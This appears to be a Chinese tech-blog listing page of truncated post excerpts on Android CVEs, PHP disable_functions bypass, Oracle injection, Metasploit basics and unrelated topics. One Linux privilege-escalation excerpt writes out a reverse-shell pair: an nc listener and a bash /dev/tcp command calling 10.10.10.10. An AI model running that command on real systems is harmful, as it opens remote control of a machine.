Android系统本周曝出了两个新的高危漏洞,影响大量设备,很多设备可 能永远得不到修复的机会(app开发ty300.com)。第一个漏洞是 Google Project Zero安全团队成员Mark Brand披露的,编号CVE 2016-3861,该漏洞允许攻击者执行恶意程序或本地提权。Bran ...
分类:
移动开发 时间:
2016-09-11 12:58:18
阅读次数:
185
转载: 利用pcntl_exec突破disable_functions 1、说明 pcntl是linux下的一个扩展,可以支持php的多线程操作。pcntl_exec函数的作用是在当前进程空间执行指定程序,版本要求:PHP > 4.2.0 2、利用 在做渗透的时候被disable_functions ...
分类:
Web程序 时间:
2016-09-11 12:41:15
阅读次数:
329
Hacking Oracle PART 3 代码/命令执行:http://www.tuicool.com/articles/A3Yzaq https://www.notsosecure.com/hacking-oracle-11g/ 犀利的 oracle 注入技术 http://www.jb51.n ...
分类:
数据库 时间:
2016-09-09 16:54:03
阅读次数:
1233
上传漏洞、登陆页暴力破解的危害性比较大,因为一旦成功,便等于获得了写文件或更改网站配置的权限,从而方便进一步提权, 下面是针对这两种威胁的防范手段: ...
分类:
Web程序 时间:
2016-09-06 13:43:39
阅读次数:
146
Linux下的漏洞提权 linux下一般都是系统漏洞提权,分为以下几个步骤: 提权 反弹shell 本地:nc -l -p 8000 目标机器:/bin/bash -i >& /dev/tcp/10.10.10.10/8000 0>&1 实例 1、得到系统版本号 centos 7 local roo ...
分类:
系统相关 时间:
2016-09-02 18:58:05
阅读次数:
369
MSF基础攻击实践 MSF的六个模块:exploit,encoder,payload,aux,post,nops exploit——渗透攻击模块 exploit——渗透攻击模块 encoder——编码器模块,对指令重新进行编码,用以实现反检测功能、指令顺利执行等 encoder——编码器模块,对指令 ...
分类:
其他好文 时间:
2016-09-02 00:34:51
阅读次数:
187
美团点评之所以接入ERP厂商,正是因为他们看到了整个餐饮行业的痛点所在,为了帮助提升整个餐饮行业的服务效率,并渗透到餐饮的全产业链中,他们开始做行业的修路人。 ...
分类:
其他好文 时间:
2016-09-01 14:46:05
阅读次数:
221
互联网的存在,是为了更高效率地解决人类长久以来的存在的需求。如今“互联网+”的概念已经渗透到社会各个领域,随着春雨医生、好大夫在线等较早一批涉水互联网医疗的企业不断发展,互联网医疗的规模也不断扩大。“诊后护理和康复指导服务”被忽视,护工行业亟待建立标准纵观目..
分类:
其他好文 时间:
2016-09-01 00:40:32
阅读次数:
298
ISIS路由渗透将L1/L2的路由器里面的L2路由条目引入到区域路由器(L1)里面默认情况下,区域内部L1的路由器只有维护区域内部的路由条目,当区域内部的路由器访问外网的时候,会将数据包直接丢到默认路由。从而使得区域内部的L1路由器学到外网的L2路由条目。(这样使得访问外网的..
分类:
其他好文 时间:
2016-08-31 15:58:59
阅读次数:
288
